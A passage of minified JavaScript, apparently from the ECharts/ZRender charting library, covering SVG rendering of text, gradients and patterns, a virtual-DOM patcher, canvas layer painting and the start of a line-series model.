r=n.font||a,s=n.x||0,l=function(t,e,n){return"top"===n?t+=e/2:"bottom"===n&&(t-=e/2),t}(n.y||0,jr(r),n.textBaseline),u={"dominant-baseline":"central","text-anchor":Pi[n.textAlign]||n.textAlign};if(ru(n)){var c="",h=n.fontStyle,p=nu(n.fontSize);if(!parseFloat(p))return;var d=n.fontFamily||o,f=n.fontWeight;c+="font-size:"+p+";font-family:"+d+";",h&&"normal"!==h&&(c+="font-style:"+h+";"),f&&"normal"!==f&&(c+="font-weight:"+f+";"),u.style=c}else u.style="font: "+r;return i.match(/\s/)&&(u["xml:space"]="preserve"),s&&(u.x=s),l&&(u.y=l),IM(u,t.transform),TM(u,n,t,e),kM(u,t),e.animation&&xM(t,u,e),sM("text",t.id+"",u,void 0,i)}}(t,e):void 0}function BM(t,e,n,i){var r,o=t[n],a={gradientUnits:o.global?"userSpaceOnUse":"objectBoundingBox"};if(Ri(o))r="linearGradient",a.x1=o.x,a.y1=o.y,a.x2=o.x2,a.y2=o.y2;else{if(!Ni(o))return void 0;r="radialGradient",a.cx=at(o.x,.5),a.cy=at(o.y,.5),a.r=at(o.r,.5)}for(var s=o.colorStops,l=[],u=0,c=s.length;u<c;++u){var h=100*Ai(s[u].offset)+"%",p=ki(s[u].color),d=p.color,f=p.opacity,g={offset:h};g["stop-color"]=d,f<1&&(g["stop-opacity"]=f),l.push(sM("stop",u+"",g))}var v=lM(sM(r,"",a,l)),y=i.gradientCache,m=y[v];m||(m=i.zrId+"-g"+i.gradientIdx++,y[v]=m,a.id=m,i.defs[m]=sM(r,m,a,l)),e[n]=zi(m)}function zM(t,e,n,i){var r,o=t.style[n],a=t.getBoundingRect(),s={},l=o.repeat,u="no-repeat"===l,c="repeat-x"===l,h="repeat-y"===l;if(Li(o)){var p=o.imageWidth,d=o.imageHeight,f=void 0,g=o.image;if(j(g)?f=g:SM(g)?f=g.src:MM(g)&&(f=g.toDataURL()),"undefined"==typeof Image){var v="Image width/height must been given explictly in svg-ssr renderer.";ct(p,v),ct(d,v)}else if(null==p||null==d){var y=function(t,e){if(t){var n=t.elm,i=p||e.width,r=d||e.height;"pattern"===t.tag&&(c?(r=1,i/=a.width):h&&(i=1,r/=a.height)),t.attrs.width=i,t.attrs.height=r,n&&(n.setAttribute("width",i),n.setAttribute("height",r))}},m=ls(f,null,t,function(t){u||y(w,t),y(r,t)});m&&m.width&&m.height&&(p=p||m.width,d=d||m.height)}r=sM("image","img",{href:f,width:p,height:d}),s.width=p,s.height=d}else o.svgElement&&(r=C(o.svgElement),s.width=o.svgWidth,s.height=o.svgHeight);if(r){var _,x;u?_=x=1:c?(x=1,_=s.width/a.width):h?(_=1,x=s.height/a.height):s.patternUnits="userSpaceOnUse",null==_||isNaN(_)||(s.width=_),null==x||isNaN(x)||(s.height=x);var b=Vi(o);b&&(s.patternTransform=b);var w=sM("pattern","",s,[r]),S=lM(w),M=i.patternCache,T=M[S];T||(T=i.zrId+"-p"+i.patternIdx++,M[S]=T,s.id=T,w=i.defs[T]=sM("pattern",T,s,[r])),e[n]=zi(T)}}function EM(t,e,n){var i=n.clipPathCache,r=n.defs,o=i[t.id];if(!o){var a={id:o=n.zrId+"-c"+n.clipPathIdx++};i[t.id]=o,r[o]=sM("clipPath",o,a,[RM(t,n)])}e["clip-path"]=zi(o)}function VM(t){return document.createTextNode(t)}function FM(t,e,n){t.insertBefore(e,n)}function HM(t,e){t.removeChild(e)}function GM(t,e){t.appendChild(e)}function WM(t){return t.parentNode}function UM(t){return t.nextSibling}function ZM(t,e){t.textContent=e}var YM=sM("","");function XM(t){return void 0===t}function jM(t){return void 0!==t}function qM(t,e,n){for(var i={},r=e;r<=n;++r){var o=t[r].key;void 0!==o&&(i[o]=r)}return i}function KM(t,e){var n=t.key===e.key;return t.tag===e.tag&&n}function $M(t){var e,n=t.children,i=t.tag;if(jM(i)){var r=t.elm=aM(i);if(tT(YM,t),Y(n))for(e=0;e<n.length;++e){var o=n[e];null!=o&&GM(r,$M(o))}else jM(t.text)&&!$(t.text)&&GM(r,VM(t.text))}else t.elm=VM(t.text);return t.elm}function QM(t,e,n,i,r){for(;i<=r;++i){var o=n[i];null!=o&&FM(t,$M(o),e)}}function JM(t,e,n,i){for(;n<=i;++n){var r=e[n];if(null!=r)if(jM(r.tag))HM(WM(r.elm),r.elm);else HM(t,r.elm)}}function tT(t,e){var n,i=e.elm,r=t&&t.attrs||{},o=e.attrs||{};if(r!==o){for(n in o){var a=o[n];r[n]!==a&&(!0===a?i.setAttribute(n,""):!1===a?i.removeAttribute(n):"style"===n?i.style.cssText=a:120!==n.charCodeAt(0)?i.setAttribute(n,a):"xmlns:xlink"===n||"xmlns"===n?i.setAttributeNS("http://www.w3.org/2000/xmlns/",n,a):58===n.charCodeAt(3)?i.setAttributeNS("http://www.w3.org/XML/1998/namespace",n,a):58===n.charCodeAt(5)?i.setAttributeNS(rM,n,a):i.setAttribute(n,a))}for(n in r)n in o||i.removeAttribute(n)}}function eT(t,e){var n=e.elm=t.elm,i=t.children,r=e.children;t!==e&&(tT(t,e),XM(e.text)?jM(i)&&jM(r)?i!==r&&function(t,e,n){for(var i,r,o,a=0,s=0,l=e.length-1,u=e[0],c=e[l],h=n.length-1,p=n[0],d=n[h];a<=l&&s<=h;)null==u?u=e[++a]:null==c?c=e[--l]:null==p?p=n[++s]:null==d?d=n[--h]:KM(u,p)?(eT(u,p),u=e[++a],p=n[++s]):KM(c,d)?(eT(c,d),c=e[--l],d=n[--h]):KM(u,d)?(eT(u,d),FM(t,u.elm,UM(c.elm)),u=e[++a],d=n[--h]):KM(c,p)?(eT(c,p),FM(t,c.elm,u.elm),c=e[--l],p=n[++s]):(XM(i)&&(i=qM(e,a,l)),XM(r=i[p.key])||(o=e[r]).tag!==p.tag?FM(t,$M(p),u.elm):(eT(o,p),e[r]=void 0,FM(t,o.elm,u.elm)),p=n[++s]);(a<=l||s<=h)&&(a>l?QM(t,null==n[h+1]?null:n[h+1].elm,n,s,h):JM(t,e,a,l))}(n,i,r):jM(r)?(jM(t.text)&&ZM(n,""),QM(n,null,r,0,r.length-1)):jM(i)?JM(n,i,0,i.length-1):jM(t.text)&&ZM(n,""):t.text!==e.text&&(jM(i)&&JM(n,i,0,i.length-1),ZM(n,e.text)))}var nT=0,iT=function(){function t(t,e,n){if(this.type="svg",this.configLayer=function(){},this.storage=e,this._opts=n=A({},n),this.root=t,this._id="zr"+nT++,this._oldVNode=cM(n.width,n.height),t&&!n.ssr){var i=this._viewport=document.createElement("div");i.style.cssText="position:relative;overflow:hidden";var r=this._svgDom=this._oldVNode.elm=aM("svg");tT(null,this._oldVNode),i.appendChild(r),t.appendChild(i)}this.resize(n.width,n.height)}return t.prototype.getType=function(){return this.type},t.prototype.getViewportRoot=function(){return this._viewport},t.prototype.getViewportRootOffset=function(){var t=this.getViewportRoot();if(t)return{offsetLeft:t.offsetLeft||0,offsetTop:t.offsetTop||0}},t.prototype.getSvgDom=function(){return this._svgDom},t.prototype.refresh=function(){if(this.root){var t=this.renderToVNode({willUpdate:!0});t.attrs.style="position:absolute;left:0;top:0;user-select:none",function(t,e){if(KM(t,e))eT(t,e);else{var n=t.elm,i=WM(n);$M(e),null!==i&&(FM(i,e.elm,UM(n)),JM(i,[t],0,0))}}(this._oldVNode,t),this._oldVNode=t}},t.prototype.renderOneToVNode=function(t){return NM(t,uM(this._id))},t.prototype.renderToVNode=function(t){t=t||{};var e=this.storage.getDisplayList(!0),n=this._width,i=this._height,r=uM(this._id);r.animation=t.animation,r.willUpdate=t.willUpdate,r.compress=t.compress,r.emphasis=t.emphasis,r.ssr=this._opts.ssr;var o=[],a=this._bgVNode=function(t,e,n,i){var r;if(n&&"none"!==n)if(r=sM("rect","bg",{width:t,height:e,x:"0",y:"0"}),Bi(n))BM({fill:n},r.attrs,"fill",i);else if(Oi(n))zM({style:{fill:n},dirty:St,getBoundingRect:function(){return{width:t,height:e}}},r.attrs,"fill",i);else{var o=ki(n),a=o.color,s=o.opacity;r.attrs.fill=a,s<1&&(r.attrs["fill-opacity"]=s)}return r}(n,i,this._backgroundColor,r);a&&o.push(a);var s=t.compress?null:this._mainVNode=sM("g","main",{},[]);this._paintList(e,r,s?s.children:o),s&&o.push(s);var l=V(W(r.defs),function(t){return r.defs[t]});if(l.length&&o.push(sM("defs","defs",{},l)),t.animation){var u=function(t,e,n){var i=(n=n||{}).newline?"\n":"",r=" {"+i,o=i+"}",a=V(W(t),function(e){return e+r+V(W(t[e]),function(n){return n+":"+t[e][n]+";"}).join(i)+o}).join(i),s=V(W(e),function(t){return"@keyframes "+t+r+V(W(e[t]),function(n){return n+r+V(W(e[t][n]),function(i){var r=e[t][n][i];return"d"===i&&(r='path("'+r+'")'),i+":"+r+";"}).join(i)+o}).join(i)+o}).join(i);return a||s?["<![CDATA[",a,s,"]]>"].join(i):""}(r.cssNodes,r.cssAnims,{newline:!0});if(u){var c=sM("style","stl",{},[],u);o.push(c)}}return cM(n,i,o,t.useViewBox)},t.prototype.renderToString=function(t){return t=t||{},lM(this.renderToVNode({animation:at(t.cssAnimation,!0),emphasis:at(t.cssEmphasis,!0),willUpdate:!1,compress:!0,useViewBox:at(t.useViewBox,!0)}),{newline:!0})},t.prototype.setBackgroundColor=function(t){this._backgroundColor=t},t.prototype.getSvgRoot=function(){return this._mainVNode&&this._mainVNode.elm},t.prototype._paintList=function(t,e,n){for(var i,r,o=t.length,a=[],s=0,l=0,u=0;u<o;u++){var c=t[u];if(!c.invisible){var h=c.__clipPaths,p=h&&h.length||0,d=r&&r.length||0,f=void 0;for(f=Math.max(p-1,d-1);f>=0&&(!h||!r||h[f]!==r[f]);f--);for(var g=d-1;g>f;g--)i=a[--s-1];for(var v=f+1;v<p;v++){var y={};EM(h[v],y,e);var m=sM("g","clip-g-"+l++,y,[]);(i?i.children:n).push(m),a[s++]=m,i=m}r=h;var _=NM(c,e);_&&(i?i.children:n).push(_)}}},t.prototype.resize=function(t,e){var n=this._opts,i=this.root,r=this._viewport;if(null!=t&&(n.width=t),null!=e&&(n.height=e),i&&r&&(r.style.display="none",t=Am(i,0,n),e=Am(i,1,n),r.style.display=""),this._width!==t||this._height!==e){if(this._width=t,this._height=e,r){var o=r.style;o.width=t+"px",o.height=e+"px"}if(Oi(this._backgroundColor))this.refresh();else{var a=this._svgDom;a&&(a.setAttribute("width",t),a.setAttribute("height",e));var s=this._bgVNode&&this._bgVNode.elm;s&&(s.setAttribute("width",t),s.setAttribute("height",e))}}},t.prototype.getWidth=function(){return this._width},t.prototype.getHeight=function(){return this._height},t.prototype.dispose=function(){this.root&&(this.root.innerHTML=""),this._svgDom=this._viewport=this.storage=this._oldVNode=this._bgVNode=this._mainVNode=null},t.prototype.clear=function(){this._svgDom&&(this._svgDom.innerHTML=null),this._oldVNode=null},t.prototype.toDataURL=function(t){var e=this.renderToString(),n="data:image/svg+xml;";return t?(e=Fi(e))&&n+"base64,"+e:n+"charset=UTF-8,"+encodeURIComponent(e)},t}();function rT(t,e,n){var i=c.createCanvas(),r=e.getWidth(),o=e.getHeight(),a=i.style;return a&&(a.position="absolute",a.left="0",a.top="0",a.width=r+"px",a.height=o+"px",i.setAttribute("data-zr-dom-id",t)),i.width=r*n,i.height=o*n,i}function oT(t){return!t.__cursors.get(0)}function aT(t){var e=t.__cursors.get(0);return{startIdx:e?e.startIdx:0,endIdx:e?e.endIdx:0}}var sT=function(t){function e(e,n,i){var r,o=t.call(this)||this;o.motionBlur=!1,o.lastFrameAlpha=.7,o.dpr=1,o.virtual=!1,o.config={},o.zlevel=0,o.zlevel2=0,o.maxRepaintRectCount=5,o.__dirty=!0,o.__firstTimePaint=!0,o.__prevIdx={startIdx:0,endIdx:0},i=i||Sr,"string"==typeof e?r=rT(e,n,i):$(e)&&(e=(r=e).id),o.id=e,o.dom=r;var a=r.style;return a&&(bt(r),r.onselectstart=function(){return!1},a.padding="0",a.margin="0",a.borderWidth="0"),o.painter=n,o.dpr=i,o}return n(e,t),e.prototype.afterBrush=function(){this.__prevIdx=aT(this)},e.prototype.initContext=function(){this.ctx=this.dom.getContext("2d"),this.ctx.dpr=this.dpr},e.prototype.setUnpainted=function(){this.__firstTimePaint=!0},e.prototype.createBackBuffer=function(){var t=this.dpr;this.domBack=rT("back-"+this.id,this.painter,t),this.ctxBack=this.domBack.getContext("2d"),1!==t&&this.ctxBack.scale(t,t)},e.prototype.createRepaintRects=function(t,e,n,i){if(this.__firstTimePaint)return this.__firstTimePaint=!1,null;var r=[],o=this.maxRepaintRectCount,a=!1,s=new Ue(0,0,0,0);function l(t){if(t.isFinite()&&!t.isZero())if(0===r.length){(e=new Ue(0,0,0,0)).copy(t),r.push(e)}else{for(var e,n=!1,i=1/0,l=0,u=0;u<r.length;++u){var c=r[u];if(c.intersect(t)){var h=new Ue(0,0,0,0);h.copy(c),h.union(t),r[u]=h,n=!0;break}if(a){s.copy(t),s.union(c);var p=t.width*t.height,d=c.width*c.height,f=s.width*s.height-p-d;f<i&&(i=f,l=u)}}if(a&&(r[l].union(t),n=!0),!n)(e=new Ue(0,0,0,0)).copy(t),r.push(e);a||(a=r.length>=o)}}for(var u=aT(this),c=u.startIdx;c<u.endIdx;++c){if(g=t[c]){var h=g.shouldBePainted(n,i,!0,!0);(v=g.__isRendered&&(1&g.__dirty||!h)?g.getPrevPaintRect():null)&&l(v);var p=h&&(1&g.__dirty||!g.__isRendered)?g.getPaintRect():null;p&&l(p)}}var d,f=this.__prevIdx;for(c=f.startIdx;c<f.endIdx;++c){var g,v;h=(g=e[c])&&g.shouldBePainted(n,i,!0,!0);if(g&&(!h||!g.__zr)&&g.__isRendered)(v=g.getPrevPaintRect())&&l(v)}do{d=!1;for(c=0;c<r.length;)if(r[c].isZero())r.splice(c,1);else{for(var y=c+1;y<r.length;)r[c].intersect(r[y])?(d=!0,r[c].union(r[y]),r.splice(y,1)):y++;c++}}while(d);return this._paintRects=r,r},e.prototype.debugGetPaintRects=function(){return(this._paintRects||[]).slice()},e.prototype.resize=function(t,e){var n=this.dpr,i=this.dom,r=i.style,o=this.domBack;r&&(r.width=t+"px",r.height=e+"px"),i.width=t*n,i.height=e*n,o&&(o.width=t*n,o.height=e*n,1!==n&&this.ctxBack.scale(n,n))},e.prototype.clear=function(t,e,n){var i=this.dom,r=this.ctx,o=i.width,a=i.height;e=e||this.clearColor;var s=this.motionBlur&&!t,l=this.lastFrameAlpha,u=this.dpr,c=this;s&&(this.domBack||this.createBackBuffer(),this.ctxBack.globalCompositeOperation="copy",this.ctxBack.drawImage(i,0,0,o/u,a/u));var h=this.domBack;function p(t,n,i,o){if(r.clearRect(t,n,i,o),e&&"transparent"!==e){var a=void 0;if(et(e))a=(e.global||e.__width===i&&e.__height===o)&&e.__canvasGradient||Im(r,e,{x:0,y:0,width:i,height:o}),e.__canvasGradient=a,e.__width=i,e.__height=o;else nt(e)&&(e.scaleX=e.scaleX||u,e.scaleY=e.scaleY||u,a=Em(r,e,{dirty:function(){c.setUnpainted(),c.painter.refresh()}}));r.save(),r.fillStyle=a||e,r.fillRect(t,n,i,o),r.restore()}s&&(r.save(),r.globalAlpha=l,r.drawImage(h,t,n,i,o),r.restore())}!n||s?p(0,0,o,a):n.length&&E(n,function(t){p(t.x*u,t.y*u,t.width*u,t.height*u)})},e}(Kt),lT=1e5,uT=314159,cT=void 0;function hT(t,e,n,i){var r=new sT(t,e,e.dpr);return r.zlevel=n,r.zlevel2=i,r.__builtin__=!0,pT(r),r}function pT(t){t.__cursorStack=[],t.__cursors=mt()}function dT(t,e){var n,i=t.__cursors,r=+e;return i.get(r)||(t.__cursorStack.push(r),i.set(r,((n={key:r}).startIdx=n.drawIdx=n.endIdx=n.endIdxNew=0,n.used=!1,n.first=n.last=NaN,n.notClearIdx=-1,n)))}function fT(t,e){for(var n=t.__cursorStack,i=0;i<n.length;i++)e(t.__cursors.get(n[i]))}function gT(t,e){var n=t.layers;return n[e]||(n[e]=new Array(3))}function vT(t,e,n){for(var i=t.layerStack,r=0;r<i.length;r++){var o=i[r].zl,a=i[r].zl2,s=t.layers[o][a];n&&(n&yT&&!s.__builtin__||n&mT&&s.__builtin__||n&_T&&s===t.hoverlayer)||e(s,o,a,r)}}var yT=1,mT=2,_T=4,xT=yT|_T,bT=function(){function t(t,e,n,i){this.type="canvas",this._prevDisplayList=[],this._layerConfig={},this._needsManuallyCompositing=!1,this.type="canvas",this._i={layerStack:[],layers:[]};var r=!t.nodeName||"CANVAS"===t.nodeName.toUpperCase();if(this._opts=n=A({},n||{}),this.dpr=n.devicePixelRatio||Sr,this._singleCanvas=r,this.root=t,t.style&&(bt(t),t.innerHTML=""),this.storage=e,this._prevDisplayList=[],r){var o=t,a=o.width,s=o.height;null!=n.width&&(a=n.width),null!=n.height&&(s=n.height),this.dpr=n.devicePixelRatio||1,o.width=a*this.dpr,o.height=s*this.dpr,this._width=a,this._height=s;var l=hT(o,this,uT,0);l.initContext(),this._insertLayer(l,uT,0,!0),this._domRoot=t}else{this._width=Am(t,0,n),this._height=Am(t,1,n);var u=this._domRoot=function(t,e){var n=document.createElement("div");return n.style.cssText=["position:relative","width:"+t+"px","height:"+e+"px","padding:0","margin:0","border-width:0"].join(";")+";",n}(this._width,this._height);t.appendChild(u)}}return t.prototype.getType=function(){return"canvas"},t.prototype.isSingleCanvas=function(){return this._singleCanvas},t.prototype.getViewportRoot=function(){return this._domRoot},t.prototype.getViewportRootOffset=function(){var t=this.getViewportRoot();if(t)return{offsetLeft:t.offsetLeft||0,offsetTop:t.offsetTop||0}},t.prototype.refresh=function(t){var e,n=at((e=t&&!$(t)?{paintAll:!!t}:t||{}).refresh,!0),i=at(e.refreshHover,!1);if(i&&(this._hoverLayerDirty=2),!n)return i&&this._paintHoverList(this.storage.getDisplayList(!1)),this;var r=this.storage.getDisplayList(!0);this._updateLayerStatus(r,e.paintAll),this._redrawId=Math.random();var o=this._prevDisplayList;this._paintList(r,o,this._redrawId);var a=this._backgroundColor;return vT(this._i,function(t,e,n,i){t.refresh&&t.refresh(0===i?a:null)},mT),this._opts.useDirtyRect&&(this._prevDisplayList=r.slice()),this},t.prototype._paintHoverList=function(t){var e=this._i.hoverlayer,n=this._hoverLayerDirty;if(this._hoverLayerDirty=cT,n!==cT&&(e||2!==n||(e=this._i.hoverlayer=this._ensureLayer(lT)),e)){e.clear();for(var i,r={inHover:!0,viewWidth:this._width,viewHeight:this._height,beforeBrushParam:{}},o=0,a=t.length;o<a;o++){var s=t[o];if(s.__inHover){i||(i=e.ctx).save();var l=s.__hoverStyle,u=void 0;l&&(u=s.style,s.style=l),Ym(i,s,r),l&&(s.style=u)}}i&&(Xm(i,r),i.restore())}},t.prototype.getHoverLayer=function(){return this._ensureLayer(lT)},t.prototype.paintOne=function(t,e){Zm(t,e)},t.prototype._paintList=function(t,e,n){if(this._redrawId===n){var i=this._doPaintList(t,e);if(this._needsManuallyCompositing&&this._compositeManually(),i)vT(this._i,function(t){t.afterBrush&&t.afterBrush()},xT),this._paintHoverList(t);else{var r=this;Sn(function(){r._paintList(t,e,n)})}}},t.prototype._compositeManually=function(){var t=this._ensureLayer(uT).ctx,e=this._domRoot.width,n=this._domRoot.height;t.clearRect(0,0,e,n),vT(this._i,function(i){i.virtual&&t.drawImage(i.dom,0,0,e,n)},yT)},t.prototype._doPaintList=function(t,e){var n=this,i=!0;return vT(this._i,function(r){var o=!1;if(fT(r,function(t){(t.drawIdx<t.endIdx||t.notClearIdx>=0)&&(o=!0)}),o||r.__dirty){var a=n._opts.useDirtyRect&&!oT(r)?r.createRepaintRects(t,e,n._width,n._height):null,s=n._i.layerStack[0],l=!0;if(r.__dirty){l=!1,r.__dirty=!1;var u=r.zlevel===s.zl&&r.zlevel2===s.zl2?n._backgroundColor:null;r.clear(!1,u,a)}fT(r,function(e){var o=n._paintPerCursor(r,e,t,a,l);i=i&&o})}},xT),r.wxa&&vT(this._i,function(t){t&&t.ctx&&t.ctx.draw&&t.ctx.draw()}),i},t.prototype._paintPerCursor=function(t,e,n,i,r){var o=t.ctx;if(i)if(i.length)for(var a=this.dpr,s=0;s<i.length;++s){var l=i[s];o.save(),o.beginPath(),o.rect(l.x*a,l.y*a,l.width*a,l.height*a),o.clip(),this._paintPerCursorInRect(t,e,n,l,r),o.restore()}else e.drawIdx=e.endIdx;else o.save(),this._paintPerCursorInRect(t,e,n,null,r),o.restore();return e.drawIdx>=e.endIdx},t.prototype._paintPerCursorInRect=function(t,e,n,i,r){for(var o={inHover:!1,allClipped:!1,prevEl:null,viewWidth:this._width,viewHeight:this._height,beforeBrushParam:{contentRetained:r}},a=t.ctx,s=oT(t),l=s&&c.getTime(),u=e.drawIdx,h=e.notClearIdx,p=h>=0?Math.min(h,u):u;p<e.endIdx;p++){var d=n[p];if(!(p<u)||d.notClear){if(d.__inHover&&(this._hoverLayerDirty=2),null!=i){var f=d.getPaintRect();f&&f.intersect(i)&&(Ym(a,d,o),d.setPrevPaintRect(f))}else Ym(a,d,o);if(s)if(c.getTime()-l>15){p++;break}}}Xm(a,o),e.drawIdx=Math.max(p,u)},t.prototype.getLayer=function(t,e){return this._ensureLayer(t,0,e)},t.prototype._ensureLayer=function(t,e,n){e=e||0;var i=this._singleCanvas;i&&!this._needsManuallyCompositing&&(t=uT,e=0);var r=gT(this._i,t)[e];return r||(r=hT("zr_"+t+"."+e,this,t,e),this._layerConfig[t]&&I(r,this._layerConfig[t],!0),(n||i&&t!==uT)&&(r.virtual=!0),this._insertLayer(r,t,e,!1),r.initContext()),r},t.prototype.insertLayer=function(t,e){this._insertLayer(e,t,0,!1)},t.prototype._insertLayer=function(t,e,n,i){var r=this._i,o=r.layers,a=r.layerStack,s=this._domRoot,l=null;if((!o[e]||!o[e][n])&&function(t){return!!t&&(!!t.__builtin__||"function"==typeof t.resize&&"function"==typeof t.refresh)}(t)){for(var u=a.length,c=0;c<u&&(a[c].zl<e||a[c].zl===e&&a[c].zl2<n);)c++;if(c>0&&(l=gT(r,a[c-1].zl)[a[c-1].zl2]),a.splice(c,0,{zl:e,zl2:n}),gT(r,e)[n]=t,!i&&!t.virtual)if(l){var h=l.dom;h.nextSibling?s.insertBefore(t.dom,h.nextSibling):s.appendChild(t.dom)}else s.firstChild?s.insertBefore(t.dom,s.firstChild):s.appendChild(t.dom);t.painter||(t.painter=this)}},t.prototype.eachLayer=function(t,e){return vT(this._i,function(n,i){t.call(e,n,i)})},t.prototype.eachBuiltinLayer=function(t,e){return vT(this._i,function(n,i){t.call(e,n,i)},yT)},t.prototype.eachOtherLayer=function(t,e){return vT(this._i,function(n,i){t.call(e,n,i)},mT)},t.prototype.getLayers=function(){var t={};return vT(this._i,function(e,n,i){t[e.id]=e}),t},t.prototype._updateLayerStatus=function(t,e){var n,i=this;if(i._singleCanvas)for(var r=1;r<t.length;r++){if((c=t[r]).zlevel!==t[r-1].zlevel||c.incremental){i._needsManuallyCompositing=!0;break}}vT(i._i,function(t){t.__dirty=!1,fT(t,function(t){t.used=!1,t.endIdxNew=0,t.notClearIdx=-1})},xT);for(var o=null,a=null,s=!1,l=0,u=t.length;l<u;l++){var c,h=(c=t[l]).zlevel,p=c.incremental,d=void 0;if(n!==h&&(n=h,s=!1),p?(s=!0,d=1):d=s?2:0,o&&h===o.zlevel&&d===o.zlevel2||(a=null,(o=i._ensureLayer(h,d)).__builtin__)){if(!(a&&p===a.key||(a=dT(o,p)).used))if(a.used=!0,e||a.first!==c.id)o.__dirty=!0,a.first=c.id,a.startIdx=a.drawIdx=l,a.endIdx=l+1;else{var f=l-a.startIdx;a.startIdx=l,a.drawIdx+=f,a.endIdx+=f}a.endIdxNew=l+1,1&c.__dirty&&!c.__inHover&&((!p||!c.notClear&&l<a.drawIdx)&&(o.__dirty=!0),p&&c.notClear&&a.notClearIdx<0&&(a.notClearIdx=l))}else k("ZLevel "+h+" has been used by unknown layer "+o.id)}vT(i._i,function(e){for(var n=e.__cursorStack,r=e.__cursors,o=n.length-1;o>=0;o--){var a=r.get(n[o]);if(a.used){var s=a.endIdxNew;(oT(e)?s<a.drawIdx:s!==a.endIdx||!s||t[s-1].id!==a.last)&&(e.__dirty=!0),a.endIdx=a.endIdxNew,a.last=s?t[s-1].id:NaN}else e.__dirty=!0,r.removeKey(n[o]),n.splice(o,1)}e.__dirty&&(fT(e,function(t){t.drawIdx=t.startIdx}),i._hoverLayerDirty===cT&&(i._hoverLayerDirty=1))},xT)},t.prototype.clear=function(){return vT(this._i,function(t){t.clear(),pT(t)},yT),this},t.prototype.setBackgroundColor=function(t){this._backgroundColor=t,vT(this._i,function(t){t.setUnpainted()})},t.prototype.configLayer=function(t,e){if(e){var n=this._layerConfig;n[t]?I(n[t],e,!0):n[t]=e,vT(this._i,function(t,e){I(t,n[e],!0)})}},t.prototype.delLayer=function(t){for(var e=this._i.layerStack,n=this._i.layers,i=e.length-1;i>=0;i--){var r=e[i];if(r.zl===t){var o=n[t][r.zl2];if(o.__builtin__)continue;if(e.splice(i,1),n[t][r.zl2]=void 0,!o.virtual){var a=o.dom.parentNode;a&&a.removeChild(o.dom)}}}},t.prototype.resize=function(t,e){if(this._domRoot.style){var n=this._domRoot;n.style.display="none";var i=this._opts,r=this.root;null!=t&&(i.width=t),null!=e&&(i.height=e),t=Am(r,0,i),e=Am(r,1,i),n.style.display="",this._width===t&&e===this._height||(n.style.width=t+"px",n.style.height=e+"px",vT(this._i,function(n){n.resize(t,e)}),this.refresh({paintAll:!0})),this._width=t,this._height=e}else{if(null==t||null==e)return;this._width=t,this._height=e,this._ensureLayer(uT).resize(t,e)}return this},t.prototype.clearLayer=function(t){E(this._i.layers[t],function(t){t&&!t.__builtin__&&t.clear()})},t.prototype.dispose=function(){this.root.innerHTML="",this.root=this.storage=this._domRoot=this._i=null},t.prototype.getRenderedCanvas=function(t){if(t=t||{},this._singleCanvas&&!this._compositeManually)return this._i.layers[314159][0].dom;var e=new sT("image",this,t.pixelRatio||this.dpr);e.initContext(),e.clear(!1,t.backgroundColor||this._backgroundColor);var n=e.ctx;if(t.pixelRatio<=this.dpr){this.refresh();var i=e.dom.width,r=e.dom.height;vT(this._i,function(t){t.__builtin__?n.drawImage(t.dom,0,0,i,r):t.renderToCanvas&&(n.save(),t.renderToCanvas(n),n.restore())})}else{for(var o={inHover:!1,viewWidth:this._width,viewHeight:this._height,beforeBrushParam:{}},a=this.storage.getDisplayList(!0),s=0,l=a.length;s<l;s++){var u=a[s];Ym(n,u,o)}Xm(n,o)}return e.dom},t.prototype.getWidth=function(){return this._width},t.prototype.getHeight=function(){return this._height},t}();var wT=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.hasSymbolVisual=!0,n}return n(e,t),e.prototype.getInitialData=function(t){return eb(null,this,{useEncodeDefaulter:!0})},e.prototype.getLegendIcon=function(t){var e=new ho,n=Mm("line",0,t.itemHeight/2,t.itemWidth,0,t.lineStyle.stroke,!1);e.add(n),n.setStyle(t.lineStyle);var i=this.getData().getVisual("symbol"),r=this.getData().getVisual("symbolRotate"),o="none"===i?"circle":i,a=.8*t.itemHeight,s=Mm(o,(t.itemWidth-a)/2,(t.itemHeight-a)/2,a,a,t.itemStyle.fill);e.add(s),s.setStyle(t.itemStyle);var l="inherit"===t.iconRotate?r:t.iconRotate||0;return s.rotation=l*Math.PI/180,s.setOrigin([t.itemWidth/2,t.itemHeight/2]),o.indexOf("empty")>-1&&(s.style.stroke=s.style.fill,s.style.fill=Cf.color.neutral00,s.style.lineWidth=2),e},e.type="series.line",e.dependencies=["grid","polar"],e.defaultOption={z:3,coordinateSystem:"cartesian2d",legendHoverLink:!0,clip:!0,label:{position:"top"},endLabel:{show:!1,valueAnimation:!0,distance:8},lineStyle:{width:2,type:"solid"},emphasis:{scale:!0},step:!1,smooth:!1,smoothMonotone:null,symbol:"emptyCircle",symbolSize:6,symbolRotate:null,showSymbol:!0,showAllSymbol:"auto",connectNulls:!1,sampling:"none",animationEasing:"linear",progressive:0,hoverLayerThreshold:1/0,universalTransition:{divideShape:"clone"},triggerLineEvent:!1,triggerEvent:!1},e}(Qv);function ST(t,e){var n=t.mapDimensionsAll("defaultedLabel"),i=n.length;if(1===i){var r=ev(t,e,n[0]);return null!=r?r+"":null}if(i){for(var o=[],a=0;a<n.length;a++)o.push(ev(t,e,n[a]));return o.join(" ")}}function MT(t,e){var n=t.mapDimensionsAll("defaultedLabel");if(!Y(e))return e+"";for(var i=[],r=0;r<n.length;r++){var o=t.getDimensionIndex(n[r]);o>=0&&i.push(e[o])}return i.join(" ")}var TT=function(t){function e(e,n,i,r){var o=t.call(this)||this;return o.updateData(e,n,i,r),o}return n(e,t),e.prototype._createSymbol=function(t,e,n,i,r,o){this.removeAll();var a=Mm(t,-1,-1,2,2,null,o);a.attr({z2:at(r,100),culling:!0,scaleX:i[0]/2,scaleY:i[1]/2}),a.drift=kT,this._symbolType=t,this.add(a)},e.prototype.stopSymbolAnimation=function(t){this.childAt(0).stopAnimation(null,t)},e.prototype.getSymbolType=function(){return this._symbolType},e.prototype.getSymbolPath=function(){return this.childAt(0)},e.prototype.highlight=function(){Qu(this.childAt(0))},e.prototype.downplay=function(){Ju(this.childAt(0))},e.prototype.setZ=function(t,e){var n=this.childAt(0);n.zlevel=t,n.z=e},e.prototype.setDraggable=function(t,e){var n=this.childAt(0);n.draggable=t,n.cursor=!e&&t?"move":n.cursor},e.prototype.updateData=function(t,n,i,r){this.silent=!1;var o=t.getItemVisual(n,"symbol")||"circle",a=t.hostModel,s=e.getSymbolSize(t,n),l=e.getSymbolZ2(t,n),u=o!==this._symbolType,c=r&&r.disableAnimation;if(u){var 